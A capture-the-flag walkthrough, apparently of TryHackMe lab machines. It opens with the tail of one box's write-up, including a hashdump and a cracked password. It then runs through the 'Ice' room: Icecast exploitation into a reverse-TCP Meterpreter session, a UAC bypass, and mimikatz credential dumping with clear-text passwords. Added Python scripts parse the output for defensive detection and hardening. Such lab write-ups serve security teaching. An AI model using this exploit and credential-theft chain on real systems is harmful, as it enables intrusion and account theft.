       2944  568   conhost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\conhost.exe
       3024  568   conhost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\conhost.exe
       3068  716   TrustedInstaller.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\servicing\TrustedInstaller.exe
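
The listing above is also what a responder would see after the fact: two `cmd.exe` processes (1952, 2236) whose parent is `spoolsv.exe`, a `powershell.exe` (1372) whose parent 2020 no longer exists, and an x86 PowerShell under it, all running as SYSTEM in session 0 where no interactive shell belongs. The code below is an added example, not part of this write-up or of Metasploit: it parses a Meterpreter `ps` table, rebuilds the parent chain, and applies three lineage rules. The `SERVICE_HOSTS` set and the session-0 rule are my own heuristics, and the sample is a subset of the rows shown above.

```python
"""Build the process tree from a Meterpreter `ps` listing and flag odd lineage (added example)."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Set, Tuple

# Constructed input: a subset of the rows from the `ps` listing above, header included.
SAMPLE_PS = r"""
 PID   PPID  Name                  Arch  Session  User                          Path
 ---   ----  ----                  ----  -------  ----                          ----
 4     0     System                x64   0
 416   4     smss.exe              x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\smss.exe
 568   560   csrss.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
 616   560   wininit.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\wininit.exe
 716   616   services.exe          x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\services.exe
 932   1372  powershell.exe        x86   0        NT AUTHORITY\SYSTEM           C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
 1356  716   spoolsv.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
 1372  2020  powershell.exe        x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
 1600  932   cmd.exe               x86   0        NT AUTHORITY\SYSTEM           C:\Windows\SysWOW64\cmd.exe
 1952  1356  cmd.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\cmd.exe
 2208  568   conhost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\conhost.exe
 2236  1356  cmd.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\cmd.exe
 2752  716   SearchIndexer.exe     x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\SearchIndexer.exe
"""

SHELLS = {"cmd.exe", "powershell.exe"}
# Heuristic (assumption): service processes that should never spawn a command shell.
SERVICE_HOSTS = {"spoolsv.exe", "svchost.exe", "services.exe", "lsass.exe", "wininit.exe", "smss.exe"}


@dataclass
class Proc:
    pid: int
    ppid: int
    name: str
    arch: str = ""
    session: Optional[int] = None
    user: str = ""
    path: str = ""


def parse_ps(text: str) -> Dict[int, Proc]:
    """Columns are padded with two or more spaces, so split on that, not on single spaces."""
    procs: Dict[int, Proc] = {}
    for line in text.splitlines():
        cols = re.split(r"\s{2,}", line.strip())
        if len(cols) < 3 or not cols[0].isdigit():
            continue  # blank line, header or separator row
        session = int(cols[4]) if len(cols) > 4 and cols[4].isdigit() else None
        procs[int(cols[0])] = Proc(
            pid=int(cols[0]), ppid=int(cols[1]), name=cols[2],
            arch=cols[3] if len(cols) > 3 else "", session=session,
            user=cols[5] if len(cols) > 5 else "", path=cols[6] if len(cols) > 6 else "",
        )
    return procs


def ancestry(procs: Dict[int, Proc], pid: int) -> List[str]:
    """Process names from pid up to the first ancestor missing from the listing."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        chain.append(procs[pid].name)
        pid = procs[pid].ppid
    return chain


def suspicious_lineage(procs: Dict[int, Proc]) -> List[Tuple[int, str]]:
    """Return (pid, rule) pairs for shells with a service parent, a vanished parent, or in session 0."""
    findings = []
    for p in procs.values():
        if p.name.lower() not in SHELLS:
            continue
        parent = procs.get(p.ppid)
        if parent is None:
            findings.append((p.pid, "orphan-shell"))
        elif parent.name.lower() in SERVICE_HOSTS:
            findings.append((p.pid, "shell-under-service"))
        if p.session == 0:  # session 0 is reserved for services on Vista and later
            findings.append((p.pid, "shell-in-session-0"))
    return findings


def pids_for(findings: List[Tuple[int, str]], rule: str) -> Set[int]:
    return {pid for pid, r in findings if r == rule}


if __name__ == "__main__":
    procs = parse_ps(SAMPLE_PS)
    for pid, rule in suspicious_lineage(procs):
        print(f"{rule:<20} pid {pid:<5} {' <- '.join(ancestry(procs, pid))}")
```

A `cmd.exe` whose chain reads `cmd.exe <- spoolsv.exe <- services.exe <- wininit.exe` is the exact artefact the EternalBlue payload leaves behind; the same rule fires on any telemetry source that records parent PIDs, not only on a Meterpreter listing.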

Cracking Passwords

meterpreter > migrate

       Usage: migrate <<pid> | -P <pid> | -N <name>> [-t timeout]

       Migrates the server instance to another process.
       NOTE: Any open channels or other dynamic state will be lost.

meterpreter > migrate -N winlogon.exe

       [*] Migrating from 932 to 668...
       [*] Migration completed successfully.

meterpreter > hashdump

       Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
       Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
       Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::

Jon's password cracks to:

    Hash                              Type  Result
    --------------------------------  ----  --------
    ffb43f0de35be4d9917ac0cc8ad57f8d  NTLM  alqfna22

All Flags Found !!!!

THM - ICE

Ice

Skibum 5/3/2020


IP Address 10.10.181.247

Recon

kali@kali:~$ nmap -sC -sV 10.10.181.247

    Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-03 13:29 EDT
    Stats: 0:02:24 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
    NSE Timing: About 98.96% done; ETC: 13:32 (0:00:01 remaining)
    Nmap scan report for 10.10.181.247
    Host is up (0.14s latency).
    Not shown: 988 closed ports
    PORT      STATE SERVICE            VERSION
    135/tcp   open  msrpc              Microsoft Windows RPC
    139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
    445/tcp   open  microsoft-ds       Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
    3389/tcp  open  ssl/ms-wbt-server?
    |_ssl-date: 2020-05-03T17:31:07+00:00; -2s from scanner time.
    5357/tcp  open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
    |_http-server-header: Microsoft-HTTPAPI/2.0
    |_http-title: Service Unavailable
    8000/tcp  open  http               Icecast streaming media server
    |_http-title: Site doesn't have a title (text/html).
    49152/tcp open  msrpc              Microsoft Windows RPC
    49153/tcp open  msrpc              Microsoft Windows RPC
    49154/tcp open  msrpc              Microsoft Windows RPC
    49158/tcp open  msrpc              Microsoft Windows RPC
    49159/tcp open  msrpc              Microsoft Windows RPC
    49160/tcp open  msrpc              Microsoft Windows RPC
    Service Info: Host: DARK-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

    Host script results:
    |_clock-skew: mean: 1h14m58s, deviation: 2h30m00s, median: -1s
    |_nbstat: NetBIOS name: DARK-PC, NetBIOS user: <unknown>, NetBIOS MAC: 02:00:4f:e5:d5:44 (unknown)
    | smb-os-discovery: 
    |   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
    |   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
    |   Computer name: Dark-PC
    |   NetBIOS computer name: DARK-PC\x00
    |   Workgroup: WORKGROUP\x00
    |_  System time: 2020-05-03T12:31:02-05:00
    | smb-security-mode: 
    |   account_used: guest
    |   authentication_level: user
    |   challenge_response: supported
    |_  message_signing: disabled (dangerous, but default)
    | smb2-security-mode: 
    |   2.02: 
    |_    Message signing enabled but not required
    | smb2-time: 
    |   date: 2020-05-03T17:31:02
    |_  start_date: 2020-05-03T17:28:52

Exploit

msf5 > search icecast

    Matching Modules
    ================

       #  Name                                 Disclosure Date  Rank   Check  Description
       -  ----                                 ---------------  ----   -----  -----------
       0  exploit/windows/http/icecast_header  2004-09-28       great  No     Icecast Header Overwrite

msf5 > use exploit/windows/http/icecast_header

msf5 exploit(windows/http/icecast_header) > show options

    Module options (exploit/windows/http/icecast_header):

       Name    Current Setting  Required  Description
       ----    ---------------  --------  -----------
       RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'  
       RPORT   8000             yes       The target port (TCP)

    Exploit target:

       Id  Name
       --  ----
       0   Automatic

msf5 exploit(windows/http/icecast_header) > set RHOSTS 10.10.181.247

    RHOSTS => 10.10.181.247

msf5 exploit(windows/http/icecast_header) > run

    [*] Started reverse TCP handler on 10.9.9.59:4444
    [*] Sending stage (180291 bytes) to 10.10.181.247
    [*] Meterpreter session 1 opened (10.9.9.59:4444 -> 10.10.181.247:49189) at 2020-05-03 13:42:08 -0400

Access Granted

meterpreter > getuid

    Server username: Dark-PC\Dark

meterpreter > sysinfo

    Computer        : DARK-PC
    OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
    Architecture    : x64
    System Language : en_US
    Domain          : WORKGROUP
    Logged On Users : 2
    Meterpreter     : x86/windows

Determine how to Escalate

msf5 > run post/multi/recon/local_exploit_suggester

msf5 > use exploit/windows/local/bypassuac_eventvwr

msf5 exploit(windows/local/bypassuac_eventvwr) > show options

    Module options (exploit/windows/local/bypassuac_eventvwr):

       Name     Current Setting  Required  Description
       ----     ---------------  --------  -----------
       SESSION  1                yes       The session to run this module on.


    Exploit target:

       Id  Name
       --  ----
       0   Windows x86

msf5 exploit(windows/local/bypassuac_eventvwr) > sessions

    Active sessions
    ===============

      Id  Name  Type                     Information             Connection
      --  ----  ----                     -----------             ----------
      1         meterpreter x86/windows  Dark-PC\Dark @ DARK-PC  10.9.9.59:4444 -> 10.10.181.247:49200 (10.10.181.247)

msf5 exploit(windows/local/bypassuac_eventvwr) > run

    [*] Started reverse TCP handler on 10.9.9.59:4444 
    [*] UAC is Enabled, checking level...
    [+] Part of Administrators group! Continuing...
    [+] UAC is set to Default
    [+] BypassUAC can bypass this setting, continuing...
    [*] Configuring payload and stager registry keys ...
    [*] Executing payload: C:\Windows\SysWOW64\eventvwr.exe
    [+] eventvwr.exe executed successfully, waiting 10 seconds for the payload to execute.
    [*] Sending stage (180291 bytes) to 10.10.181.247
    [*] Meterpreter session 2 opened (10.9.9.59:4444 -> 10.10.181.247:49206) at 2020-05-03 13:54:56 -0400
    [*] Cleaning up registry keys ...

meterpreter > getprivs

    Enabled Process Privileges
    ==========================

    Name
    ----
    SeBackupPrivilege
    SeChangeNotifyPrivilege
    SeCreateGlobalPrivilege
    SeCreatePagefilePrivilege
    SeCreateSymbolicLinkPrivilege
    SeDebugPrivilege
    SeImpersonatePrivilege
    SeIncreaseBasePriorityPrivilege
    SeIncreaseQuotaPrivilege
    SeIncreaseWorkingSetPrivilege
    SeLoadDriverPrivilege
    SeManageVolumePrivilege
    SeProfileSingleProcessPrivilege
    SeRemoteShutdownPrivilege
    SeRestorePrivilege
    SeSecurityPrivilege
    SeShutdownPrivilege
    SeSystemEnvironmentPrivilege
    SeSystemProfilePrivilege
    SeSystemtimePrivilege
    SeTakeOwnershipPrivilege
    SeTimeZonePrivilege
    SeUndockPrivilege

meterpreter > ps

    Process List
    ============

     PID   PPID  Name                  Arch  Session  User                          Path
     ---   ----  ----                  ----  -------  ----                          ----
     0     0     [System Process]                                                   
     4     0     System                x64   0                                      
     416   4     smss.exe              x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\smss.exe
     544   536   csrss.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
     584   692   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
     592   536   wininit.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\wininit.exe
     604   584   csrss.exe             x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
     652   584   winlogon.exe          x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\winlogon.exe
     692   592   services.exe          x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\services.exe
     700   592   lsass.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsass.exe
     708   592   lsm.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsm.exe
     816   692   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
     848   692   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
     884   692   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
     932   692   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
     1020  692   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
     1060  692   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
     1184  692   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
     1212  816   WmiPrvSE.exe          x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\wbem\WmiPrvSE.exe
     1300  1020  dwm.exe               x64   1        Dark-PC\Dark                  C:\Windows\System32\dwm.exe
     1312  1284  explorer.exe          x64   1        Dark-PC\Dark                  C:\Windows\explorer.exe
     1364  692   spoolsv.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
     1392  692   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
     1456  692   taskhost.exe          x64   1        Dark-PC\Dark                  C:\Windows\System32\taskhost.exe
     1540  692   amazon-ssm-agent.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe
     1636  692   LiteAgent.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\Xentools\LiteAgent.exe
     1676  692   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
     1816  692   Ec2Config.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe
     2072  908   powershell.exe        x86   1        Dark-PC\Dark                  C:\Windows\SysWOW64\WindowsPowershell\v1.0\powershell.exe
     2208  692   sppsvc.exe            x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\sppsvc.exe
     2224  692   TrustedInstaller.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\servicing\TrustedInstaller.exe
     2284  1312  Icecast2.exe          x86   1        Dark-PC\Dark                  C:\Program Files (x86)\Icecast2 Win32\Icecast2.exe
     2500  692   vds.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\vds.exe
     2616  692   SearchIndexer.exe     x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\SearchIndexer.exe
     2644  816   rundll32.exe          x64   1        Dark-PC\Dark                  C:\Windows\System32\rundll32.exe
     2676  2644  dinotify.exe          x64   1        Dark-PC\Dark                  C:\Windows\System32\dinotify.exe
     3068  604   conhost.exe           x64   1        Dark-PC\Dark                  C:\Windows\System32\conhost.exe

meterpreter > migrate -N spoolsv.exe

    [*] Migrating from 2072 to 1364...
    [*] Migration completed successfully.

meterpreter > getuid

    Server username: NT AUTHORITY\SYSTEM

Load Credential Dumping Tool (kiwi)

meterpreter > load kiwi

    Loading extension kiwi...
      .#####.   mimikatz 2.2.0 20191125 (x64/windows)
     .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
     ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
     ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
     '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
      '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

    Success.

    Kiwi Commands
    =============

        Command                Description
        -------                -----------
        creds_all              Retrieve all credentials (parsed)
        creds_kerberos         Retrieve Kerberos creds (parsed)
        creds_msv              Retrieve LM/NTLM creds (parsed)
        creds_ssp              Retrieve SSP creds
        creds_tspkg            Retrieve TsPkg creds (parsed)
        creds_wdigest          Retrieve WDigest creds (parsed)
        dcsync                 Retrieve user account information via DCSync (unparsed)
        dcsync_ntlm            Retrieve user account NTLM hash, SID and RID via DCSync
        golden_ticket_create   Create a golden kerberos ticket
        kerberos_ticket_list   List all kerberos tickets (unparsed)
        kerberos_ticket_purge  Purge any in-use kerberos tickets
        kerberos_ticket_use    Use a kerberos ticket
        kiwi_cmd               Execute an arbitary mimikatz command (unparsed)
        lsa_dump_sam           Dump LSA SAM (unparsed)
        lsa_dump_secrets       Dump LSA secrets (unparsed)
        password_change        Change the password/hash of a user
        wifi_list              List wifi profiles/creds for the current user
        wifi_list_shared       List shared wifi profiles/creds (requires SYSTEM)

meterpreter > creds_all

    [+] Running as SYSTEM
    [*] Retrieving all credentials
    msv credentials
    ===============

    Username  Domain   LM                                NTLM                              SHA1
    --------  ------   --                                ----                              ----
    Dark      Dark-PC  e52cac67419a9a22ecb08369099ed302  7c4fe5eada682714a036e39378362bab  0d082c4b4f2aeafb67fd0ea568a997e9d3ebc0eb

    wdigest credentials
    ===================

    Username  Domain     Password
    --------  ------     --------
    (null)    (null)     (null)
    DARK-PC$  WORKGROUP  (null)
    Dark      Dark-PC    Password01!

    tspkg credentials
    =================

    Username  Domain   Password
    --------  ------   --------
    Dark      Dark-PC  Password01!

    kerberos credentials
    ====================

    Username  Domain     Password
    --------  ------     --------
    (null)    (null)     (null)
    Dark      Dark-PC    Password01!
    dark-pc$  WORKGROUP  (null)
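
The `creds_all` tables above show the same account's password in clear text under three providers (wdigest, tspkg, kerberos) next to its LM/NT hashes from msv; on a Windows 7 host that means LSASS is still caching reversible logon credentials, which is what KB2871997 plus `UseLogonCredential = 0` under `HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest` turns off. The parser below is an added example, not code from this write-up or from Metasploit's kiwi extension: it reads the `<provider> credentials` sections, skips null and machine accounts, and builds a per-account exposure summary a hardening review would want. The sample is a re-typed copy of the output above, and `EMPTY_LM` is the well-known value of an empty LM hash.

```python
"""Summarise kiwi creds_all output into a per-account credential exposure report (added example)."""
import re
from typing import Dict, List

# Constructed sample: the creds_all output shown above, re-typed.
SAMPLE_CREDS = """\
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username  Domain   LM                                NTLM                              SHA1
--------  ------   --                                ----                              ----
Dark      Dark-PC  e52cac67419a9a22ecb08369099ed302  7c4fe5eada682714a036e39378362bab  0d082c4b4f2aeafb67fd0ea568a997e9d3ebc0eb

wdigest credentials
===================

Username  Domain     Password
--------  ------     --------
(null)    (null)     (null)
DARK-PC$  WORKGROUP  (null)
Dark      Dark-PC    Password01!

tspkg credentials
=================

Username  Domain   Password
--------  ------   --------
Dark      Dark-PC  Password01!

kerberos credentials
====================

Username  Domain     Password
--------  ------     --------
(null)    (null)     (null)
Dark      Dark-PC    Password01!
dark-pc$  WORKGROUP  (null)
"""

SECTION = re.compile(r"^(\w+) credentials\s*$")
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM field when no LM hash is stored


def parse_creds_all(text: str) -> Dict[str, List[Dict[str, str]]]:
    """Return {provider: [row dicts keyed by the table's column names]}."""
    sections: Dict[str, List[Dict[str, str]]] = {}
    current, headers = None, None
    for raw in text.splitlines():
        line = raw.strip()
        m = SECTION.match(line)
        if m:
            current, headers = m.group(1), None
            sections[current] = []
            continue
        if current is None or not line or set(line) <= {"=", "-", " "}:
            continue  # preamble, blank line, or an underline/separator row
        cols = re.split(r"\s{2,}", line)  # columns are padded with two or more spaces
        if headers is None:
            headers = cols
        else:
            sections[current].append(dict(zip(headers, cols)))
    return sections


def _is_null_or_machine(row: Dict[str, str]) -> bool:
    user = row.get("Username", "")
    return user == "(null)" or user.endswith("$")


def exposure_report(text: str) -> Dict[str, dict]:
    """Per DOMAIN\\user: which providers held a clear-text password, the NT hash, and
    whether a real (non-empty) LM hash was present."""
    report: Dict[str, dict] = {}
    for provider, rows in parse_creds_all(text).items():
        for row in rows:
            if _is_null_or_machine(row):
                continue
            key = f'{row.get("Domain", "")}\\{row["Username"]}'
            entry = report.setdefault(key, {"plaintext_from": [], "ntlm": None, "lm_present": False})
            if provider == "msv":
                entry["ntlm"] = row.get("NTLM")
                entry["lm_present"] = row.get("LM", EMPTY_LM).lower() != EMPTY_LM
            elif row.get("Password") not in (None, "(null)"):
                entry["plaintext_from"].append(provider)
    return report


if __name__ == "__main__":
    for account, info in exposure_report(SAMPLE_CREDS).items():
        print(account, "plaintext via:", ", ".join(info["plaintext_from"]) or "none",
              "| LM hash present:", info["lm_present"])
```

Any account with a non-empty `plaintext_from` list is one whose password was recoverable without cracking; the fix is on the host (WDigest setting, patch level, Protected Users / Credential Guard where available), not on the account.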

meterpreter > run post/windows/manage/enable_rdp

    [*] Enabling Remote Desktop
    [*]     RDP is already enabled
    [*] Setting Terminal Services service startup mode
    [*]     The Terminal Services service is not set to auto, changing it to auto ...
    [*]     Opening port in local firewall if necessary
    [*] For cleanup execute Meterpreter resource file: /home/kali/.msf4/loot/20200503141549_default_10.10.181.247_host.windows.cle_049924.txt

Access via RDP gained !!!